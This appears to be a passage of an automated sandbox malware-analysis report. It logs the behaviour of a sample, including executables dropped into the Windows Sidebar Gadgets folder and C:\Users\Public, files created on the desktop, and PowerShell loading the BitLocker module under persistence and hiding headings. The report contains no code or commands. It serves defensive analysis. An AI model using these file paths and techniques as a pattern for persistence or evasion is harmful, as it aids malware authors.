                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\UhMZMMnD.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\EfGUsIxp.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\urceIxCH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\bfAYobhs.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\RrWiEPnK.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\zeucltSv.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\YoKhhehz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\NAfrxSmR.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\voDmexRC.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\VDeRaRWG.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\JKpAqWmX.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\jUEFnHBb.logJump to dropped file

                          Boot Survival

                          barindex
                          Drops PE files to the user root directory
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\Public\UserOOBEBroker.exeJump to dropped file

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
